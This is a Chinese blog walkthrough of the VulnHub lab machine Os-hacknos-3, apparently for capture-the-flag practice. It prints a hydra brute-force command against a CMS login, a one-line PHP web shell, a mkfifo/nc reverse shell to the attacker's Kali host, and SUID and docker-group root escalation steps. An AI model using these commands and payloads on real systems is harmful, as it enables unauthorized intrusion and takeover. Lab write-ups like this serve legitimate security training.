<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="𝐴_𝑌𝑢">





<title>vulnhub靶机—Os-hacknos-3 | 𝓐_𝚼𝓾ʹ𝒔 𝓑ℓ𝖔𝓰</title>



    <link rel="icon" href="/image/favicon.svg">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    
    <link rel="stylesheet" href="//cdn.bootcss.com/font-awesome/4.3.0/css/font-awesome.min.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        
    


    <link rel="stylesheet" href="//at.alicdn.com/t/font_1614813_fp9wxdcpr9c.css"
<meta name="generator" content="Hexo 6.1.0"></head>
<body>
    <div class="wrapper">
        <link rel="stylesheet" href="../fonts/iconfont2/iconfont.css"> 

<header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/"><i class="iconfont icon-zhuye"></i>主页</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">
                        
                            <i class="iconfont icon-archives "></i>
                        
                        
                        
                        
                        文章
                    </a>
                
                    <a class="menu-item" href="/category">
                        
                        
                            <i class="iconfont icon-categorys "></i>
                        
                        
                        
                        分类
                    </a>
                
                    <a class="menu-item" href="/tag">
                        
                        
                        
                            <i class="iconfont icon-tags "></i>
                        
                        
                        标签
                    </a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>

        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">主页</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; 菜单</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">
                        
                            <i class="iconfont icon-archives "></i>
                        
                        
                        
                        
                        文章
                    </a>
                
                    <a class="menu-item" href="/category">
                        
                        
                            <i class="iconfont icon-categorys "></i>
                        
                        
                        
                        分类
                    </a>
                
                    <a class="menu-item" href="/tag">
                        
                        
                        
                            <i class="iconfont icon-tags "></i>
                        
                        
                        标签
                    </a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
        <div class="main">
            <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">▶︎ 展开目录</a>
    </div>
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a onclick="go_top()">△ 顶部</a>
        <a onclick="go_bottom()">▽ 底部</a>
    </div>
</div>

<script>
    document.ready(
        function () {
            tocbot.init({
                tocSelector: '.tocbot-list',
                contentSelector: '.post-content',
                headingSelector: 'h1, h2, h3, h4, h5',
                collapseDepth: 1,
                orderedList: false,
                scrollSmooth: true,
            })
        }
    )

    function expand_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 6,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "collapse_toc()");
        b.innerHTML = "▼ 收起目录"
    }

    function collapse_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 1,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "expand_toc()");
        b.innerHTML = "▶︎ 展开目录"
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">vulnhub靶机—Os-hacknos-3</h1>
            
                <div class="post-meta">
                    
                        <!--作者:-->
                        <i class="iconfont icon-user"></i>
                        <a itemprop="author" rel="author" href="/">𝐴_𝑌𝑢 </a> &nbsp;
                    

                    
                        <span class="post-time">
                        <!--发布时间:-->
                        <i class="iconfont icon-time"></i>
                        <a href="#">2022-04-25&nbsp;&nbsp;12:37:48</a> &nbsp;
                        </span>
                    
                    
                        <span class="post-category">
                        <!--分类:-->
                        <i class="iconfont icon-category"></i>
                            
                                <a href="/categories/vulnhub%E9%9D%B6%E6%9C%BA/">vulnhub靶机</a>&nbsp;
                            
                        </span>
                    
                    
                    <span id="/2022/04/25/22-0425-01/" class="leancloud-visitors view" data-flag-title="vulnhub靶机—Os-hacknos-3">
                        <text class="post-meta-item-text">
                            <!--阅读数:-->
                            <i class="iconfont icon-view"></i>
                        </text>
                        
                        <text class="leancloud-visitors-count">加载中</text>
                      </span>
                    
                </div>
            
        </header>

        <div class="post-content">
            <p> 靶机地址：<a target="_blank" rel="noopener" href="https://www.vulnhub.com/entry/hacknos-os-hacknos-3,410/">https://www.vulnhub.com/entry/hacknos-os-hacknos-3,410/</a> </p>
<blockquote>
<p>kali的ip：192.168.43.212  靶机ip：192.168.43.233</p>
</blockquote>
<h1 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h1><h2 id="namp扫描端口"><a href="#namp扫描端口" class="headerlink" title="namp扫描端口"></a>namp扫描端口</h2><p><code>nmap -p- -A 192.168.43.233</code></p>
<img src="/2022/04/25/22-0425-01/image-20220425145142003.png" class title="image-20220425145142003">

<h2 id="目录扫描"><a href="#目录扫描" class="headerlink" title="目录扫描"></a>目录扫描</h2><p><code>gobuster dir -u http://192.168.43.233 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100</code></p>
<img src="/2022/04/25/22-0425-01/image-20220425143007010.png" class title="image-20220425143007010">

<p>发现了&#x2F;websec&#x2F;目录</p>
<img src="/2022/04/25/22-0425-01/image-20220425155335679.png" class title="image-20220425155335679">

<p>然后对<code>http://192.168.43.233/websec/</code>进行目录扫描<br><code>gobuster dir -u http://192.168.43.233/websec/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100</code></p>
<img src="/2022/04/25/22-0425-01/image-20220425144200469.png" class title="image-20220425144200469">

<p>扫描到了admin目录，尝试访问admin目录，发现了登陆后台，并且用的Gila版本的CMS</p>
<img src="/2022/04/25/22-0425-01/image-20220425144944158.png" class title="image-20220425144944158">

<p>然后百度上搜索该CMS的相关漏洞，并没有发现能够直接利用的地方</p>
<h2 id="hydra穷举后台密码"><a href="#hydra穷举后台密码" class="headerlink" title="hydra穷举后台密码"></a>hydra穷举后台密码</h2><p>这里要求输入e-mail和password，e-mail可能就是之前我们发现的邮箱，但是密码我们不知道，可以先用cewl爬取该目录下面的相关单词，并且保存到cewl.txt文件，作为爆破用的字典</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">CeWL(自定义单词列表生成器)是一个ruby应用程序，它会抓取给定的URL，直到指定的深度，并返回单词列表，然后可以用于密码破解</span><br></pre></td></tr></table></figure>

<p><code>cewl http://192.168.43.233/websec/ &gt; cewl.txt</code></p>
<img src="/2022/04/25/22-0425-01/image-20220425160139971.png" class title="image-20220425160139971">

<p>分析登陆框的一些参数</p>
<img src="/2022/04/25/22-0425-01/image-20220425162508340.png" class title="image-20220425162508340">

<img src="/2022/04/25/22-0425-01/image-20220425162908361.png" class title="image-20220425162908361">

<p>然后用hydra来穷举密码，方式如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">hydra -l contact@hacknos.com -P cewl.txt 192.168.43.233 http-post-form &quot;/websec/admin:username=^USER^&amp;password=^PASS^:Wrong email&quot;</span><br><span class="line">参数说明：</span><br><span class="line">-l：指定用户名</span><br><span class="line">-P：指定字典文件</span><br><span class="line">http-post-form：使用表单模块http-post-form</span><br><span class="line">/websec/admin：表示该表单最终action提交到的地方</span><br><span class="line">username=^USER^：表示表单的username参数输入^USER^，^USER^表示的是前面的contact@hacknos.com</span><br><span class="line">password=^PASS^：表示表单的password参数输入^PASS^，^PASS^表示的是前面字典cewl.txt的内容</span><br><span class="line">Wrong email：表示如果登陆失败显示Wrong email</span><br></pre></td></tr></table></figure>

<p>我们得到了账号<code>contact@hacknos.com</code>和密码<code>Securityx</code></p>
<img src="/2022/04/25/22-0425-01/image-20220425163031735.png" class title="image-20220425163031735">

<p>然后登陆后台</p>
<img src="/2022/04/25/22-0425-01/image-20220425163227019.png" class title="image-20220425163227019">

<p>发现有上传点，上传test.php，内容如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="title function_ invoke__">system</span>(<span class="variable">$_REQUEST</span>[<span class="string">&#x27;test&#x27;</span>]);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<img src="/2022/04/25/22-0425-01/image-20220425170148420.png" class title="image-20220425170148420">

<p>虽然禁止访问该路径，但确实上传成功了</p>
<img src="/2022/04/25/22-0425-01/image-20220425174151387.png" class title="image-20220425174151387">

<h2 id="删除-htaccess文件"><a href="#删除-htaccess文件" class="headerlink" title="删除.htaccess文件"></a>删除.htaccess文件</h2><p>由于.htaccess文件的限制所以我们无法访问，这里删除里面内容即可</p>
<img src="/2022/04/25/22-0425-01/image-20220425174732212.png" class title="image-20220425174732212">

<p>然后我们就可以访问了，并且能够执行命令</p>
<img src="/2022/04/25/22-0425-01/image-20220425174825866.png" class title="image-20220425174825866">

<h2 id="反弹shell"><a href="#反弹shell" class="headerlink" title="反弹shell"></a>反弹shell</h2><p>kali本地监听9001端口 nc -lnvp 9001</p>
<img src="/2022/04/25/22-0425-01/image-20220425214646672.png" class title="image-20220425214646672">

<p>burp抓包，然后通过nc进行反弹，把burp提交方式get改为post，反弹命令如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 192.168.43.212 9001 &gt;/tmp/f</span><br></pre></td></tr></table></figure>

<p>注意：在post方式提交时，要进行编码，<code>ctrl+u</code></p>
<img src="/2022/04/25/22-0425-01/image-20220425214750702.png" class title="image-20220425214750702">

<p>然后我们会拿到靶机的shell</p>
<img src="/2022/04/25/22-0425-01/image-20220425214845294.png" class title="image-20220425214845294">

<p>然后换python shell                              <code>python -c &#39;import pty;pty.spawn(&quot;/bin/bash&quot;)&#39;</code></p>
<img src="/2022/04/25/22-0425-01/image-20220425214955073.png" class title="image-20220425214955073">

<p>看下passwd文件的内容</p>
<img src="/2022/04/25/22-0425-01/image-20220425215505535.png" class title="image-20220425215505535">

<p>过滤掉nologin的内容 <code>cat /etc/passwd | grep -v nologin</code></p>
<img src="/2022/04/25/22-0425-01/image-20220425215647238.png" class title="image-20220425215647238">

<p>进入blackdevil用户的home目录下，发现第一个falg</p>
<img src="/2022/04/25/22-0425-01/image-20220425220426022.png" class title="image-20220425220426022">

<h1 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h1><h2 id="SUID提权"><a href="#SUID提权" class="headerlink" title="SUID提权"></a>SUID提权</h2><p>查看拥有SUID特权的文件</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find /usr/bin -<span class="built_in">type</span> f -perm -u=s 2&gt;/dev/null</span><br></pre></td></tr></table></figure>

<img src="/2022/04/25/22-0425-01/image-20220425220525952.png" class title="image-20220425220525952">

<h3 id="下面我们利用cpulimit提权"><a href="#下面我们利用cpulimit提权" class="headerlink" title="下面我们利用cpulimit提权"></a>下面我们利用cpulimit提权</h3><p>利用cpulimit调用sh shell和bash shell，但是提权失败了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">cpulimit -l 100 -f /bin/sh</span><br><span class="line">cpulimit -l 100 -f /bin/bash</span><br><span class="line"></span><br><span class="line">参数说明</span><br><span class="line">-l：可以设置1~100之间的值，这里设置为100</span><br><span class="line">-f：后面可接二进制文件</span><br></pre></td></tr></table></figure>

<img src="/2022/04/25/22-0425-01/image-20220425221539218.png" class title="image-20220425221539218">

<p>在kali上创建一个文件suid.c，文件内容如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span> </span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span> </span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span> </span></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc,<span class="type">char</span> *argv[])</span></span><br><span class="line">&#123;</span><br><span class="line">	setreuid(<span class="number">0</span>,<span class="number">0</span>);</span><br><span class="line">	execve(<span class="string">&quot;/bin/bash&quot;</span>,<span class="literal">NULL</span>,<span class="literal">NULL</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>然后编译成suidexp</p>
<img src="/2022/04/25/22-0425-01/image-20220425222323621.png" class title="image-20220425222323621">

<p>然后通过base64转换，把suidexp文件移动到靶机上</p>
<img src="/2022/04/25/22-0425-01/image-20220425222502585.png" class title="image-20220425222502585">

<p>在靶机的shell下创建sexp64</p>
<img src="/2022/04/25/22-0425-01/image-20220425223303409.png" class title="image-20220425223303409">

<p>在靶机的shell中创建sda文件  <code>vi sda</code></p>
<img src="/2022/04/25/22-0425-01/image-20220425233638176.png" class title="image-20220425233638176">

<p>然后把上面suidexp经过base64转换后的内容复制到sda中，注意这里在vim或者vi中进行粘贴时候一定要用命令进行粘贴 <code>ctrl+shift+v</code>而不要用鼠标右键点击粘贴，这样粘贴的内容可能会不全，后面再用base64命令进行转换时候会出错</p>
<p>然后再sda文件转换成二进制sad <code>base64 -d -i sda &gt;sad</code></p>
<p>然后加权限，用cpulimit命令执行即可拿到root权限，并且拿到flag</p>
<img src="/2022/04/25/22-0425-01/image-20220425233918328.png" class title="image-20220425233918328">



<h1 id="Docker提权"><a href="#Docker提权" class="headerlink" title="Docker提权"></a>Docker提权</h1><p>上面我们已经获取root权限了，然后我们用root权限切换到blackdevil用户，发现该用户属于docker用户组</p>
<img src="/2022/04/25/22-0425-01/image-20220425234407637.png" class title="image-20220425234407637">

<p>查看有没有镜像文件，这里没有镜像文件</p>
<img src="/2022/04/25/22-0425-01/image-20220425234442427.png" class title="image-20220425234442427">

<p>我们创建一个alpine的容器，如果没有alpine镜像会自动下载镜像文件</p>
<img src="/2022/04/25/22-0425-01/image-20220425234845814.png" class title="image-20220425234845814">

<p>exit退出docker容器</p>
<img src="/2022/04/25/22-0425-01/image-20220425235815973.png" class title="image-20220425235815973">

<p>然后把靶机的根目录挂载到alpine容器的&#x2F;mbt目录下 <code>docker run -it -v /:/mbt 0ac33e5f5afa</code>，这样我们访问容器的mbt目录就是访问靶机的根目录</p>
<img src="/2022/04/25/22-0425-01/image-20220425235712677.png" class title="image-20220425235712677">

<p>访问flag2</p>
<img src="/2022/04/25/22-0425-01/image-20220425235852155.png" class title="image-20220425235852155">

        </div>		
		
        <section class="post-tags">
            <div>
                <span>标签:</span>
                <span class="tag">
                    
                    
                        <a href="/tags/cewl%E6%94%B6%E9%9B%86%E5%AF%86%E7%A0%81%E5%AD%97%E5%85%B8/">
                            <i class="iconfont icon-tag1"></i>
                            cewl收集密码字典
                        </a>
                    
                        <a href="/tags/hydra%E7%A9%B7%E4%B8%BE/">
                            <i class="iconfont icon-tag1"></i>
                            hydra穷举
                        </a>
                    
                        <a href="/tags/suid%E6%8F%90%E6%9D%83/">
                            <i class="iconfont icon-tag1"></i>
                            suid提权
                        </a>
                    
                        <a href="/tags/docker%E6%8F%90%E6%9D%83/">
                            <i class="iconfont icon-tag1"></i>
                            docker提权
                        </a>
                    
                        
                </span>
            </div>
            <div>
                <a href="/">
                    <i class="iconfont icon-home"></i>
                    主页
                </a>
                <span>· </span>
                <a href="javascript:window.history.back();">
                    <i class="iconfont icon-back"></i>
                    返回
                </a>
                
                
            </div>
        </section>
        <section class="post-nav">
            
                <a class="prev" rel="prev" href="/2022/04/26/22-0426-01/">windwos下反弹shell的方法</a>
            
            
            <a class="next" rel="next" href="/2022/04/24/22424%E4%B8%80/">vulnhub靶机—CyNix</a>
            
        </section>
        <br>
        
            <section id="comments" class="comments">
              <style>
                  .comments{ margin-top: 30px;}
                  .v .vlist .vcard .vcontent {padding-top: 0;}
                  .vcontent p { color:grey; margin-bottom: 10px;}
                  .v * {line-height: normal;}
                  .v .vwrap  {border-radius: 0px; padding: 10px;}
                  .v .vbtn {border-radius: 0px;}
                  .v code, .v pre {border-radius: 0px;}
                  .v .vlist .vcard .vhead .vsys {border-radius: 1px; padding: 2px;}
                  .v .vlist .vcard .vhead .vnick {color: #2d96bd;}
                  .v .vlist .vcard .vh .vmeta .vat{color: #c7254e;}
                  .v .vlist .vcard {padding-top: 0;}
                  .v .vlist .vcard .vimg { width: 2.5em; height: 2.5em; }
                  .v .vlist .vcard .vquote .vimg { width: 2.5em; height: 2.5em; }
              </style>
              <div class="valine_comment"></div>
<!--载入js，在</body>之前插入即可-->
<!--Leancloud 操作库:-->
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<!--Valine 的核心代码库-->
<script src="//unpkg.com/valine/dist/Valine.min.js"></script>
<script>
    new Valine({
        app_id: 'baahrwTTyOayDYUv5AtkdGJj-gzGzoHsz',
        app_key: 'iTfzn8X60g9v0zTtnvToc09l',
        placeholder: '想对作者说点什么...',
        notify: 'false',
        verify: 'false',
        avatar: 'retro',
        visitor: 'true'
    });
</script>
            </section>
        
    </article>
</div>



<style>

.post-wrap { table-layout:fixed; word-break:break-all; overflow:hidden; }

</style>
        </div>
        <footer id="footer" class="footer">

 <div class="copyright">

 <span>© 𝐴_𝑌𝑢

 <!-- 访客数量 -->

 

 <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

<span class="site-uv">
    | 总访客量:
    <i class="busuanzi-value" id="busuanzi_value_site_uv"><i class="fa fa-spinner fa-spin"></i></i>
</span>&nbsp;


<span class="site-pv">
    | 总访问量:
    <i class="busuanzi-value" id="busuanzi_value_site_pv"><i class="fa fa-spinner fa-spin"></i></i>
</span>


 

 </span>

 </div>

</footer>
    </div>
</body>
</html>


	



<script type="text/javascript" src="\js\jquery.js"></script>
<script type="text/javascript" src="\js\jquery.min.js"></script>

<script  type="text/javascript" src="\js\snow.js"></script>

